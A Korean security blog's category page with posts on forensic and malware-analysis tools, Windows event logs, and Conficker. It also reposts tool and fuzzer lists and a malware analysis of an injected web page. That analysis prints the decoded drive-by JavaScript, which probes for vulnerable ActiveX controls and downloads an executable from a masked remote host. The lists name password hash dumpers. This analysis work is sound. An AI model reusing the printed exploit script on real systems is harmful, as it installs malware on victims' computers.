태터데스크 관리자

도움말
닫기
적용하기   첫페이지 만들기

태터데스크 메시지

저장하였습니다.

'┏ Analysis'에 해당되는 글 17건

  1. 2014.09.24 Windows 침해사고대응 도구
  2. 2013.11.26 Malwr - 악성코드 행위 분석
  3. 2012.04.24 [윈도우이벤트로그] 로그온 유형
  4. 2012.04.15 보안 이벤트 ID 설명
  5. 2009.12.29 Malware Defense 삭제 방법
  6. 2009.08.31 RunScanner 1.8.1.0 - 시스템 분석 도구
  7. 2009.08.27 threatexpert - 샘플 분석 사이트
  8. 2009.08.25 Mazilla - 악성코드 분석 프로그램
  9. 2009.04.08 Conficker란 무엇이냐~ (3)
  10. 2009.03.23 Conficker C Analysis
  11. 2007.11.27 FreeBSD Kernel Debugging
  12. 2007.11.14 웹 사이트를 통해서 전파되는 악성코드 분석 #1
  13. 2007.11.11 [본문스크랩] Filemon & Regmon, Tcpview
  14. 2007.11.11 동명대 THINK - 악성코드 분석 방법론
  15. 2007.10.14 Fuzzer list
  16. 2007.10.12 Anubis: Analyzing Unknown Binaries
  17. 2007.10.07 ELF 파일 포맷분석

Windows 침해사고대응 도구

┏ Analysis 2014.09.24 18:25

아래 링크에서 소개해주고 있다.

http://windowsir.blogspot.kr/p/foss-tools.html

 

 

FOSS Tools
I wanted to keep a list of tools as a reference for myself, but also provide it in such a manner that others can make use of the list, as well.

Memory Collection/Analysis
FTK Imager - Includes the ability to collect memory
DumpIt - Great utility for dumping Windows memory; 32- & 64-bit versions in one EXE!
Volatility - 'nuff said! (Google Code project home)
Mandiant RedLine
HBGary Responder CE

Don't want to collect your own memory?
NIST memory images
List from ForensicsWiki
"Federal" Trojan sample
HoneyNet "Banking Troubles" Challenge

Network Capture/Analysis Tools
WireShark - Excellent free tool for capturing and analyzing network packet captures
NetworkMiner - Network forensic analysis tool
Netwitness Investigator - free edition of the tool; supports 25 simultaneous 1GB captures.
Network Appliance Forensic Toolkit (NAFT) by Didier Stevens - Python-based, can extract packets from Windows memory.  If you're using 32-bit Python and your input file is greater than 512MB, split it into chunks.

Sample Images
Digital Corpora - Simson Garfinkel's site with test images and scenarios
Hacking Case from NIST (CFReDs)
Lance Mueller's Practical examples - Lance no longer maintains the site, but the site itself will remain; Practical #1 is an excellent example to use.
Interesting image and scenario from InfoSecShortTakes

Carving
PhotoRec - from the site: "...designed to recover lost files including video, documents and archives from hard disks, CD-ROMs, and lost pictures (thus the Photo Recovery name) from digital camera memory. PhotoRec ignores the file system and goes after the underlying data..."
Scalpel - v2.0; excellent carver that (like others) is file system independent.  You can also create custom .conf file entries.
ParseRS/RipRS - John Moan's tools for recovering IE Travelog/RecoveryStore pages.

Image Mounting
OSFMount
ImDisk - Installs as a Control Panel applet
FTK Imager
vhdtool - use this tool to convert a raw/dd image file to a .vhd file, which you can mount using the Disk Management tool in Win7
raw2vmdk - Java utility convert a raw/dd image to .vmdk
LiveView - Java utility for creating VMWare support files for a raw/dd image; you can then boot the image (if you're not LE, consider using ntpasswd below to 'zero out' the Administrator password so that you can log in...)
VirtualBox - Oracle's free virtualization framework that can run a wide range of guest OS's, including OS/2, Amiga, Android, etc., as well as Linux and Windows.

File System Artifact Tools
analyzeMFT - David Kovar's Python tool for parsing the MFT
MFT Extractor (hmft.exe) - Extract the MFT for parsing with other tools
INDXParse - Tool for parsing index/$I30 files
Joachim Schicht's MFT Tools (mft2csv, LogFileParser, etc.)

File Analysis
PDF Tools from Didier Stevens
PDFStreamDumper - description of use here;
SWF Mastah - Python script to make extracting SWF streams from PDF files easier

Analysis Frameworks
OSForensics - Features listed here; file searches, hash lists, rainbow tables.  Primarily intended to work on live systems, but you can mount an image as a volume and run it against that.
DFF - FOSS digital analysis framework; be sure to read and follow the blog.
ProDiscover Basic Edition - Free, limited version of ProDiscover; you'll need to scroll down (also be sure to check out ZeroView)
SANS SIFT Workstation - SANS Forensic Appliance
Autopsy - As of Aug 2011, Windows only version (in beta) is a complete rewrite, using Java.

Registry Analysis
RegRipper - Get it here (RR.zip), includes regslack; also, more info here...
Registry Decoder

Shellbag Forensics (w/ a Python script and bodyfile format output)
Digital Forensics Stream blog post: Including Shellbags Data in Timelines
Chad's Shellbags analysis article (w/ link to TZWorks sbag.exe)

Password Recovery
Now and again, there's a need to change or crack Windows passwords; for LE, often just knowing if an account had a password or not is enough.
Ntpwedit - allows you to change a Windows password; based on Nordahl's tool
Ntpasswd - Nordahl's tool; includes option for a CD/USB bootdisk to change a Windows password
pwdump7 - dump password hashes
SAMInside - password hash cracker
OphCrack - password hash cracker
L0phtcrack - no introduction necessary (15 day trial)

Phones/Phone Backup Files
I wanted to include a section to address FOSS tools for accessing mobile devices/phones, as well as backups of these devices that you might find on a Windows system.

iPhone
iPhoneBrowser - Access the iPhone file system from a Windows GUI
iPhone Analyzer
iPhoneBackupExtractor - includes a free download for extracting files from an iPhone backup
iPhone Backup Browser -
*You can also use the information in this article (even more info is available from this AppleExaminer article), and use SQLite or SQLite Browser to access information in the db files; for working with plists, consider plutil.exe (installed with iTunes) for converting plists.  Also consider this article from Linux Sleuthing that describes parsing the iPhone SMS database.
iTwin -

This SlideShare presentation talks about using open source tools to analyze iOS devices.

BlackBerry
ForensicsWiki BlackBerry Forensics page (watch out for these common pitfalls)
Blackberry Desktop Manager software
There is some additional information at Eric Huber's blog, via an interview with Shafik Punja.
Blackberry.com IPD file format
ElcomSoft BlackBerry Explorer -for pay, but has a limited trial version (read/parse IPD/BBB files)
Get additional information from a BB (after backup) using JavaLoader (NOT a forensic tool)
Bye Nary blog post - What's in an IPD?

Other possible solutions (untested):
Reincubate Labs - Blackberry Backup Extractor
MagicBerry IPD parser

Android
If you're interested in seeing if there's any location information available in an Android phone, check out android-locdump. 

While not specific to Windows, check out this Wiki page at the HoneyNet site for a VirtualBox VM you can download to do Android malware RE.

eEvidence.info site for mobile forensics
Cellular.Sherlock - lots of great info available on mobile forensics

PE Analysis Tools
HBGary Fingerprint - Analysis/comparison tool, extensible via C#
CFF Explorer - Understands .NET files, extensible via scripting
TZWorks pe_view and pescan
PEiD - discontinued, but good tool
PEView

Metadata tools
Phil Harvey's EXIFTool
Zena Forensics EXIF Summarizer - Python script
Word 2007 metadata - read_open_xml.pl

Other tools
Wifi WAP geolocation using macl.pl
VMDK Forensic Artifact Extractor (vfae.exe) - extract files from a VMDK
Jesse updated md5deep to include Win PE file identification (miss identify)

Browser Analysis
Sean Cavanaugh's paper on Safari cache.db analysis (refers to the Forensics from the Sausage Factory blog posts)

Firefox
Kristinn's SANS  blog write-up regarding FF3+ history (ff3histview.pl)
MozillaZine: Contents of user's profile folder
ForensicsWiki: FF3 History File format
Write-up on F3e

Chrome
Hindsight Chrome history parser

Sites
These are some sites that include a number of useful tools:
TZWorks - lots of great tools including a shellbag parser
NirSoft - another site with a lot of great tools
Tools I've written and provided with my books (WRF tools, timeline tools, etc.)
WoanWare - Lots of great free utilities, including some for browser analysis
OpenSourceForensics - site with a number of *nix/Windows tools listed
pyDetective - Site containing Python scripts for DF analysis
ForensicCtrl - Free forensic tool list
MalwareHunters Free Tools
My Forensic Tools (from the UK): Some interesting free tools
BethLogic Code site

 

Trackbacks 133 : Comments 0

Write a comment


Malwr - 악성코드 행위 분석

┏ Analysis 2013.11.26 10:45
https://malwr.com/

 

Trackbacks 0 : Comments 0

Write a comment


[윈도우이벤트로그] 로그온 유형

┏ Analysis 2012.04.24 16:54

출처: http://yeonpil.org/archives/1715

0 : 시스템 계정만이 사용
2 – Interactive : 로컬로그온이나 터미널, 원격쉘 과 같은 로그온 형식
3 – Network : 기본인증
4 – Batch : 예약작업같은 배치실행시 사용되는 계정의 로그온
5 – Service : 서비스 실행 계정
6 – Proxy : 프록시 타입
7 – Unlock : GINA DLLs 로그온을 대시하는 형식
8 – NetworkCleartext : FTP나, IIS 기본인증과 같은 형식, Windows 2000 이후 부터 지원
9 – NewCredentials :Windows 2000 이후 부터 지원
10 – RemoteInteractive : 터미널 서버 또는 그와 같은 형식
11 – CachedInteractive : 네트워크 연결이 아닌 캐시된 자격증명
12 – CachedRemoteInteractive : RemoteInteractive 와 같음
13 – CachedUnlock : 워크스테이션 로그온

 

 

 

출처 : http://security-guys.blogspot.com/2010/04/blog-post.html

  

  • 로그온 유형 2 (Logon Type 2) : 대화식

    • 콘솔에서 키보드로 로그인 (LogMeIn, TeamView, KVM 포함)

  • 로그온 유형 3 (Logon Type 3) : 네트워크

    • 네트워크를 통한 원격 로그인. (파일 공유, IIS 접속 등)

     

  • 로그온 유형 4 (Logon Type 4) : 자동실행(스케줄)

    • 스케줄에 등록된 배치 작업 실행시 미리 설정된 계정 정보로 로그인

     

  • 로그온 유형 5 (Logon Type 5) : 서비스

    • 서비스가 실행될때 미리 설정된 계정 정보로 로그인

     

  • 로그온 유형 7 (Logon Type 7) : 잠금해제

    • 화면보호기 잠금 해제시
  • 로그온 유형 8 (Logon Type 8) : 네트워크 (평문암호)

    • 유형 3과 비슷하지만 계정 정보를 평문으로 전송시 발생 (ASP 기본 암호설정)\

     

  • 로그온 유형 9 (Logon Type 9) : 새 자격
    • 실행(RunAs)에서 프로그램 실행시 /netonly 옵션을 줄때

     

  • 로그온 유형 10 (Logon Type 10) : 원격 대화식
    • 터미널 서비스, 원격 접속, 원격지원으로 로그인

     

  • 로그온 유형 11 (Logon Type 11) : 캐쉬된 대화식

    • PC에 캐쉬로 저장된 암호로 자동 입력 로그인시
  •  

    Trackbacks 0 : Comments 0

    Write a comment


    보안 이벤트 ID 설명

    ┏ Analysis 2012.04.15 02:13

    이벤트 로그를 분석하기 위해서는 이벤트ID를 숙지하는 것이 필수!!

     

    1. Windows XP, 2000, 2003

    - http://support.microsoft.com/kb/299475

    - http://support.microsoft.com/kb/301677

     

     

    2. Windows Vista, 7, 2008

    - http://support.microsoft.com/kb/977519

     

     

    3. eventlog database

    http://eventopedia.cloudapp.net/Events/?/Operating+System/Microsoft+Windows/Built-in+logs/Windows+2008/Security+Log/Account+Logon/Credential+Validation

    Trackbacks 0 : Comments 0

    Write a comment


    Malware Defense 삭제 방법

    ┏ Analysis 2009.12.29 16:32

    요놈 골칫거리네...

    벌새 님 블로그에도 치료기가 없고...

    구글에서 발견함...


    < 치료법 보기 >




     

    Trackbacks 0 : Comments 0

    Write a comment


    RunScanner 1.8.1.0 - 시스템 분석 도구

    ┏ Analysis 2009.08.31 11:25


    < runscanner 리뷰 보기 >



    용기백배님이 소개해주셔서 벌새님 블로그로 가서 리뷰를 읽어보았습니다.

    베리베리 핫~

    그동안 sysinternals 도구를 이것저것 하면서 시스템 분석했던 것을 이 도구 하나로 해결할 수 있을 것 같습니다.

    제 직업에 딱 맞는 도구!!

    VirusTotal과의 연동, process explorer, autoruns, 웹검색 연동, 기타 다양한 기능 제공, 전문가 포럼 사이트에서의 정보 공유 및 업데이트 자료 제공가능...

    RunScanner 사이트에서도 현존하는 거의 모든(제 생각임..) 파일 정보를 제공하여 시스템에서 존재하는 파일의 이상여부를 알 수도 있네요.






    좋네요 ^.^/

    '┏ Analysis' 카테고리의 다른 글

    보안 이벤트 ID 설명  (0) 2012.04.15
    Malware Defense 삭제 방법  (0) 2009.12.29
    RunScanner 1.8.1.0 - 시스템 분석 도구  (0) 2009.08.31
    threatexpert - 샘플 분석 사이트  (0) 2009.08.27
    Mazilla - 악성코드 분석 프로그램  (0) 2009.08.25
    Conficker란 무엇이냐~  (3) 2009.04.08
    Trackbacks 1 : Comments 0

    Write a comment


    threatexpert - 샘플 분석 사이트

    ┏ Analysis 2009.08.27 15:00




    < threatexpert 바로가기 >

    샘플을 보내면 보고서형식으로 작성되어 메일로 받아볼 수 있는 사이트입니다.

    어떤 의심되는 파일이 있다면 이 파일이 어떤 행동을 하는지 알아볼 수 있습니다. 샌드박스 프로그램과 같습니다.

    ThreatExpert Report에서는 각종 샘플들에 대한 보고서도 찾아볼 수 있습니다.


    submit sample을 통해 파일과 메일주소를 입력하면 메일로 보고서를 받아볼 수 있습니다.

    tools에서 제공하는 파일업로드 전용 프로그램을 이용하여 업로드할 수도 있습니다.

    간단히 하나 올려보고 보고서를 받아보았습니다. 대략 시간은 5~10분 내에 오는 것 같습니다.

    보고서 내용은 아래와 같습니다.





    기타 샌드박스 사이트들입니다.

    http://anubis.iseclab.org/

    http://www.cwsandbox.org/?page=submit&action=verify

    http://www.norman.com/microsites/nsic/

    http://www.threatexpert.com/submit.aspx

    '┏ Analysis' 카테고리의 다른 글

    Malware Defense 삭제 방법  (0) 2009.12.29
    RunScanner 1.8.1.0 - 시스템 분석 도구  (0) 2009.08.31
    threatexpert - 샘플 분석 사이트  (0) 2009.08.27
    Mazilla - 악성코드 분석 프로그램  (0) 2009.08.25
    Conficker란 무엇이냐~  (3) 2009.04.08
    Conficker C Analysis  (0) 2009.03.23
    Trackbacks 0 : Comments 0

    Write a comment


    Mazilla - 악성코드 분석 프로그램

    ┏ Analysis 2009.08.25 14:52



    Malzilla라는 악성코드 분석에 특화된 프로그램을 소개하면서 악성 스크립트를 분석한 자료입니다.

    http://core.ahnlab.com/6

    다양한 디코더도 기본 탑재되어 있네요.

    좋은 것 같네요^^

    '┏ Analysis' 카테고리의 다른 글

    RunScanner 1.8.1.0 - 시스템 분석 도구  (0) 2009.08.31
    threatexpert - 샘플 분석 사이트  (0) 2009.08.27
    Mazilla - 악성코드 분석 프로그램  (0) 2009.08.25
    Conficker란 무엇이냐~  (3) 2009.04.08
    Conficker C Analysis  (0) 2009.03.23
    FreeBSD Kernel Debugging  (0) 2007.11.27
    Trackbacks 0 : Comments 0

    Write a comment


    Conficker란 무엇이냐~

    ┏ Analysis 2009.04.08 17:16

    2008년도...나름 2008년도 최고의 작품이라고도 불리는 conficker...

    이놈이 ms08-067 취약점이 발표되고나서 탄생하더니 굉장히 많이 발전했다. 처음 ms08-067취약점이 발견될 당시 짧은 내 소관으론 밀웜에서 익스플로잇 좀 뜨다 말겠지 했지만...천만의 말씀 만만의 콩떡~! 예상을 완전 뒤엎고 호랑이새끼 한마리가 태어났으니... 그 이름 conficker(downadup)!!

    4월1일 만우절 바이러스에 비상이 걸리며 여러 보안업체에서 conficker에 대한 변종 이력과 기능에 대해서 분석한 자료들을 만들어 냈다. 또한 회사에서도 비상이 걸린 것!! 하루에 만우절 바이러스에 대한 문의가 폭주...입에 단내가 나도록 상담했다.

    이하 내용은 여기저기서 본 머리속의 자료들을 짜깁기한 것이다. 보기에 알기 쉽고 내 머리속에 정리하는 차원에서 작성해보겠다.
     

    1. 변종 이력
     Conficker.A(Downadup)
    2008.11.21
    Conficker.B/C(Downadup.B)
    2008.12.30
    Conficker.D(Downadup.C)
    2009.3.6
    <전파>
    ms08-067 취약점 공격
    <전파>
    파일(네트워크) 공유(brute force)
    이동식 미디어 감염(USB)
    <전파>
    없음 
    <C&C>
    HTTP
    <C&C>
    HTTP
    초보적인 P2P
    <C&C>
    개선된 HTTP
    강력한 P2P 
    <보호기능>
    없음
    <보호기능>
    일부 DNS 조회 중지
    자동 업데이트 중지
    HTTP 코드 서명 이용
    P2P 코드 서명 이용
    <보호기능>
    일부 DNS 조회 중지
    자동 업데이트 중지
    P2P 및 HTTP 코드 서명 이용
    보안 소프트웨어 중지
    개선된 분석 방지(분석도구 실행 방지)

    * symantec에서는 downadup이라고 명명함.

    위와 같이 conficker는 짧은 시간에 진화되었다.

    conficker의 대표적인 특징을 살펴보면

    2. 특징

    ▷ HTTP : conficker 안의 도메인 생성 알고리즘을 통해 생성된 도메인으로부터 악성코드를 다운로드 받는다. 또는 봇넷을 업데이트까지 한다. 이러한 메커니즘을 phonig-home 또는 internet rendezvous라고 한다. 매일 5만개의 도메인을 생성한 후 그 중에서 업데이트를 확인할 500개의 도메인을 임의로 선택한다. 또는 필요한 정보(시간이나 위치)를 수집하거나 악성코드를 다운로드 및 실행한다.

    ▷ P2P : B부터는  P2P 프로토콜을 사용하여 HTTP C&C 채널을 사용하지 않고도 봇넷을 업데이트 할 수 있도록 했다. 게다가 봇넷을 방어하기 위해 디지털 서명 기능을 포함했다. conficker는 감염되면 시스템 및 네트워크의 정보를 모두 수집하여 이것을 기반으로 IP 및 도메인을 생성한다. 실행시에는 레지스트리에 저장된 키로부터 얻은 값과 다른 값들을 시드 값으로 사용하는 난수 함수를 사용해 임의로 생성되거나, 이전에 캐시된 2048개의 피어목록에서 임의로 선택된다. 캐시된 피어들은 두개의 특정 레지스트리 키에 암호화되어 저장된다.

    감염된 봇넷들의 시스템들은 서로 간의 통신을 위해 특수하게 제작된 P2P 프로토콜이 사용된다. TCP, UDP포트에 모두 적용되고, 패킷분석을 어렵게 하기 위해 패킷에 임의의 데이터가 추가된다.(대략 이정도만..)

    ▷ 보호기능 : 웜 제작자는 코드 압축을 완전히 풀더라도 해당 바이너리를 분석하기 어렵게 만들기 위해 추가적인 조치들을 취했다. 
      - 가상화 방지, 추적 방지 : 네트워크상에서 VM 탐지 방법으로, SLDT, SIDT, STR, SGDT, VMware I/O Port magic, invalid VirtualPC opcode 가 사용되었다.
      - 보안기능 중지 : sysinternal 도구들은 물론 거의 대부분의 분석도구들과 관련된 프로세스들을 찾아 종료시키려고 시도한다.
      - DNS 조회 후킹 : 여러 보안 도메인에 대한 접속 시도를 가로채기 위해 다양한 DNS관련 Windows API 기능을 후킹한다.
      - GetTickCount() 타이밍을 사용한 안티 디버깅
      - 디지털 서명(RC4, RSA, MD6)
      - 또한 해당 버그를 다시 공격하지 못하도록, 해당 취약점에 대해 메모리상의 우회 패치를 수행한다. 이말은 즉슨, ms08-067취약점 패치를 수행한 것으로 시스템을 속여 진짜 패치를 받지 않게 만들거나 다른 ms08-067취약점을 이용한 악성코드가 침투하지 않도록 한다.

    이상이 conficker에 대한 개략적인 정리이다.

    마지막 변종이 전파기능이 없는 것으로 보아 웜 제작자들은 기존 감염된 시스템의 감염 기간을 늘리고, 아직 알려지지 않은 목적을 위해 사용할 수 있도록 보호하는데 집중하고 있는 것으로 보인다.

    ms에서 현상금까지 내건 conficker 제작자들은 어디에 숨어 있는 것이고... 또 누구일까? 잡히면 분명 대서특필할 것 같다.
    Trackbacks 1 : Comments 3
    1. Favicon of http://suban.tistory.com BlogIcon suban 2009.04.09 09:53 신고 Modify/Delete Reply

      '추가시켜드릴게요~' 그러면 내가 마치 부탁하는거 같자나...ㅡ,.ㅡ;

    2. Favicon of http://boanchanggo.tistory.com BlogIcon JQ 2009.04.15 22:54 신고 Modify/Delete Reply

      올만에 형 블로그에 댓글을 남기네요~~ ^^ 이거 제 글에 링크 할게요~~ 예민하셔

    Write a comment


    Conficker C Analysis

    ┏ Analysis 2009.03.23 13:25

    SRI International에서 Conficker paper를 업데이트하였습니다.

    Conficker의 변종인 Conficker C를 다루고 있습니다.

     

    Title: Conficker C Analysis

    Author: Phillip Porras, Hassen Saidi, and Vinod Yegneswaran

    Source: SRI International

    Date Published: 19th March 2009

     

    http://mtc.sri.com/Conficker/addendumC/

    Trackbacks 0 : Comments 0

    Write a comment


    FreeBSD Kernel Debugging

    ┏ Analysis 2007.11.27 19:58
    Trackbacks 0 : Comments 0

    Write a comment


    웹 사이트를 통해서 전파되는 악성코드 분석 #1

    ┏ Analysis 2007.11.14 18:52

    출처 : http://fullc0de.egloos.com/3484340

    웹 사이트를 통해서 전파되는 악성코드 분석 #1

    오랜만에 악성코드 하나를 분석해보겠습니다.

    최근에 유행하는 형태가 유명사이트나 포털에 존재하는 웹 기반 취약점을 이용하여 악성 웹 페이지를 삽입하는 것이죠. 얼마전 조선일보에서 발생했던 악성 웹 페이지 삽입 건이 이와 거의 유사하다고 보시면 됩니다.

    최근에 입수한 악성 웹 페이지 중 모 회사 웹사이트에 삽입되었던 것이 있는데 그 악성 웹 페이지는 다음과 같은 기술을 적용하고 있었습니다.

    1. 문자열에 대한 HEX 인코딩 적용
    2. 1차 공격 코드에 대한 BASE64 인코딩 적용
    3. BASE64로 인코딩 된 공격 코드에 대한 XXTEA 암호화 기술 적용
    4. UTF16 문자열 사용
    5. 4번까지 진행한 문자열을 eval()로 실행


    악성 웹 페이지를 열람하게 되면 사용자의 브라우저(IE)에서 1~5까지 순서로 진행됩니다. 해당 프로세스의 특징은 백신이나 IPS를 우회하기 위한 성격이 강하죠. 다음은 위 과정중 XXTEA 암호화 기술을 구현한 함수입니다.


    function xxtea_decrypt(Cu26,NcC27)
    {
    if(Cu26=="")
    {
    return "";
    }

    var mMFb28=str2long(Cu26,false);
    var _qu_29=str2long(NcC27,false);
    var Gdms30=mMFb28["length"]-1;
    var O31=mMFb28[Gdms30-1], Qf32=mMFb28[0], yM33=0x9E3779B9;
    var MTY34,unHqa35,rz36=window["Math"]["floor"](6+52/(Gdms30+1)), uWduXhGKv37=rz36*yM33&0xffffffff;

    while(uWduXhGKv37!=0)
    {
    unHqa35=uWduXhGKv37>>>2&3;
    for(var QHDZttd38=Gdms30; QHDZttd38>0; QHDZttd38--)
    {
    O31=mMFb28[QHDZttd38-1];
    MTY34=(O31>>>5^Qf32<<2)+(Qf32>>>3^O31<<4)^(uWduXhGKv37^Qf32)+(_qu_29[QHDZttd38&3^unHqa35]^O31);
    Qf32=mMFb28[QHDZttd38]=mMFb28[QHDZttd38]-MTY34&0xffffffff;
    }

    O31=mMFb28[Gdms30];
    MTY34=(O31>>>5^Qf32<<2)+(Qf32>>>3^O31<<4)^(uWduXhGKv37^Qf32)+(_qu_29[QHDZttd38&3^unHqa35]^O31);
    Qf32=mMFb28[0]=mMFb28[0]-MTY34&0xffffffff;
    uWduXhGKv37=uWduXhGKv37-yM33&0xffffffff;
    }
    return long2str(mMFb28,true);
    }


    첫번째 인자는 XXTEA로 encrypt 된 문자열이 들어오고 두번째는 KEY 인것 같습니다. ^^;; 위키피디아에 나와 있는 내용을 참조하시면 될 듯 하네요.

    http://en.wikipedia.org/wiki/XXTEA

    그리고 소스에서 사용되는 변수들이 대부분 래덤하게 생성한 느낌이 드네요. 악성코드를 자동으로 생성해주는 자동 툴이 존재할 수 있을 것 같습니다. (단지 추측일 뿐 -_-;;)


    일단 모든 과정을 다 통과하면 최종 결과물을 얻을 수 있는데 다음과 같았습니다. (민감한 부분은 *처리 하겠습니다.)

    <중략>

    if(document.cookie.indexOf('OK')==-1)
    {
    try {
    var e;
    var ado=(document.createElement("object"));
    ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-****-00C04FC29E36");
    var as=ado.createobject("Adodb.Stream","")
    }catch(e){

    };
    finally{
    var expires=new Date();
    expires.setTime(expires.getTime()+24*60*60*1000);
    document.cookie='iewin=vions;
    path=/;
    expires='+expires.toGMTString();
    if(e!="[object Error]"){
    document.write("")
    }else{
    try {
    var f;
    var storm=new ActiveXObject("MPS.StormPlayer")
    }catch(f){

    };
    finally {
    if(f!="[object Error]"){
    document.write("")
    }
    }try {
    var g;
    var pps=new ActiveXObject("POWERPLAYER.PowerPlayerCtrl.1")
    }catch(g) {

    };finally {
    if(g!="[object Error]"){
    document.write("")
    }
    }try {
    var h;
    var obj=new ActiveXObject("BaiduBar.Tool")
    }catch(h){

    };finally {
    if(h!="[object Error]"){
    obj.DloadDS("http://www.****.com/web/**.cab","**.exe",0)
    }
    }

    if(f=="[object Error]"&&g=="[object Error]"&&h=="[object Error]"){
    document.write("")
    }
    }
    }
    }


    코드를 대략 ?어보시면 3가지 ActiveX의 존재유무를 체크하고 아무것도 없으면 마지막부분에 특정 html을 다운로드 한다는 것을 알 수 있습니다. 3가지는 다음과 같습니다.

    1. MPS.StormPlayer
    2. POWERPLAYER.PowerPlayerCtrl
    3. BaiduBar.Tool


    각 항목마다 js 파일이 존재하며 항목에 맞는 공격을 수행하도록 설정이 되어 있습니다. 아무것도 없을 경우에는 GlobalLink의 ConnectAndEnterRoom ActiveX를 타겟으로 하는 공격코드를 다운로드 합니다.

    항목에 맞는 공격코드가 실행이되면 전부 원격지에서 특정 악성프로그램을 다운로드 받아 사용자 PC에 자동설치합니다.
    뭐.. 악성코드는 해커 마음이겠져... 제가 다운로드 받아서 분석해본 악성프로그램은 Dropper의 일종이였습니다.

    virustotal.com 의 힘(?)을 빌어 검사해보니 시그니처가 쭉 나오네요. 아래와 같답니다.


    V3도 Dropper로 잡네요.. 탐지율이 좋아진 것 같아서 좋네요 ㅋㅋ
    Trackbacks 0 : Comments 0

    Write a comment


    [본문스크랩] Filemon & Regmon, Tcpview

    ┏ Analysis 2007.11.11 19:10

    정적분석기법과 동적분석기법을 사용하는데,

    동적분석기법은 통제된 환경속에서 프로그램을 실행하여 프로그램이 접근하는 파일/레지스트리/네트워크커넥션등의 정보를 수집하고 파일의 동작방식을 살펴보는 방법입니다. 이때 사용하는 프로그램으로는 regmon, filemon, seehook, ethereal, tcpview 등의 프로그램이 있습니다.

    정적분석기법은 프로그램을 직접 분석하는 방법으로 주로 디버거, 디스어셈블러, 헥사에디터, PE 파일뷰어 등을 이용하게 됩니다. 이런 툴들을 이용하시려면 프로그램 경험도 풍부하셔야 하고 무엇보다도 어셈블리에 대해서 잘 아셔야 합니다. 주로 사용하는 디버거로는 OllyDBG, softice 등이 있으며 디스어셈블러는 IDA pro 등이 있습니다. 헥사에디터는 winhex나 ultraeditor같은 것 씁니다. PE뷰어는 peview나 pe explorer 등이 있습니다.

    Filemon은 실시간으로..현재 돌아가는 파일들을 아주 상세하게
    권한까지 보여줌...첨에 막 실행하면 글씨가 매우 작으나
    폰트 설정 해주시면 잘 보입니다^^

    Regmon은 간단하게 보면 실시간으로레지스트리에 돌아가는 음...
    메모리 상에서 돌아가는 것들을 보여줌
    이것도 실시간이라..무엇인가를 실행하면 바로 뜹니다..
    로그로 기록도 가능 함.^^

    TCP와 UDP 연결 상태를 확인할 수 있는 모니터링 툴인 TCPView입니다.

    명령어 프롬프트창에서 'netstat' 명령어를 치면 나오는 포트 관련된 각종 프로토콜 상황이 나오는것 처럼 인터넷 프로토콜인 TCP와 IP를 사용하는 네트웍 내에서 컴퓨터들 간에 메시지들 이 교환될 때 제한된 서비스만을 제공하는 통신 프로토콜인 UDP의 접속 상태를 전체적으로 한눈에 확인할 수 있는 프로그램입니다.

    1초, 2초, 5초, 10초 간격으로 네트워크 상태를 점검할 수 있게 하며 상태를 텍스트 형식으로 저장하는 기능등 많은 기능보다는 본래의 모니터링 기능에 충실합니다.

    실행되는 즉시 포트 스캐닝이 되며 앞에는 어떤 프로그램이 연결되는건지 (ex: MSN 메신저, MS Outlook) 아이콘으로 표시되고 있습니다.

    가볍게 설치할 수 있는 간단한 모니터링 프로그램 입니다.

    이 프로그램은 프리웨어로 사용제한이 없습니다.


    Trackbacks 0 : Comments 0

    Write a comment


    동명대 THINK - 악성코드 분석 방법론

    ┏ Analysis 2007.11.11 19:04

    툴소개 및 악성코드 분석 방법, 필요 지식, 추천 도서 등이 나와 있습니다.

    다운로드 : 악성코드 분석 방법론.pdf

    Trackbacks 0 : Comments 0

    Write a comment


    Fuzzer list

    ┏ Analysis 2007.10.14 18:01

    출처 : http://somma.egloos.com/2813959

    http://www.infosecinstitute.com/blog/2005/12/fuzzers-ultimate-list.html

    Fuzzers - The ultimate list

    I spent the last week performing a penetration test for a customer, and at the close of the test I usually have a one-day in person "remediation meeting". One of the "action items" for me from the meeting was to respond with a list of fuzzers (sometimes called fault injectors) that can be used for in house pen testing. If you aren't familar with fuzzers and what they are, here is my best stab at a definition:

    Fuzzer: A fuzzer is a program that attempts to discover security vulnerabilities by sending random input to an application. If the program contains a vulnerability that can leads to an exception, crash or server error (in the case of web apps), it can be determined that a vulnerability has been discovered. Fuzzers are often termed Fault Injectors for this reason, they generate faults and send them to an application. Generally fuzzers are good at finding buffer overflow, DoS, SQL Injection, XSS, and Format String bugs. They do a poor job at finding vulnerabilites related to information disclosure, encryption flaws and any other vulnerability that does not cause the program to crash.

    Hows that? A prerequisite for building a fuzzers, is that you have to give it a cool name. There was one called stabface (yes, stabface), that would use the Google API to do SQL Injection against .govs and .mils. The author found a lot of neat holes, but never released the tool. Ok, here is the list:

    (L)ibrary (E)xploit API - lxapi - A collection of python scripts for fuzzing
    Mangle - A fuzzer for generating odd HTML tags, it will also autolaunch a browser. Mangle found the infamous IFRAME IE bug.
    SPIKE - A collection of many fuzzers from Immunity. Used to find the recent remote RDP kernel DoS against a firewalled XP SP2, and many others.
    PROTOS WAP - A fuzzer from the PROTOS project for fuzzing WAP.
    PROTOS HTTP-reply - Another fuzzer from the PROTOS dudes for attack HTTP responses, useful for broswer vulns.
    PROTOS LDAP - For fuzzing LDAP, not as successful as the others from the PROTOS project
    PROTOS SNMP - Classic SNMP fuzzer, found a vuln in almost every networking gear available at the time (2002).
    PROTOS SIP - For fuzzing all those new VOIP SIP devices you see everywhere.
    PROTOS ISAKMP - For attacking IPSec implementations
    RIOT & faultmon - For attacking plain text protocols (Telnet, HTTP, SMTP). Used by Riley Hassell when he worked at eEye to discover the IIS .printer overflow and included in The Shellcoder's Handbook.
    SPIKE Proxy - A semi-functional web fuzzer from the guys at Immunity that brought you the original SPIKE
    Tag Brute Forcer - Awesome fuzzer from Drew Copley at eEye for attacking all of those custom ActiveX applications. Used to find a bunch of nasty IE bugs, including some really hard to reach heap overflows.
    FileFuzz - A file format fuzzer for PE (Windows) binaries from iDefense. Has a pretty GUI. I've recently used it to find bugs in Word.
    SPIKEFile - Another file format fuzzer for attacking ELF (Linux) binaries from iDefense. Based off of SPIKE listed above.
    notSPIKFile - A ELF fuzzer closely related to FileFuzz, instead of using SPIKE as a starting point.
    Screaming Cobra - Name makes the fuzzer sound better than it really is, but is good for finding CGI bugs. Also, its a perl scrpt so easy to modify or extend.
    WebFuzzer - A fuzzer for (guess what?) web app vulns. Just as good as some of the cheap commercial web fuzzers.
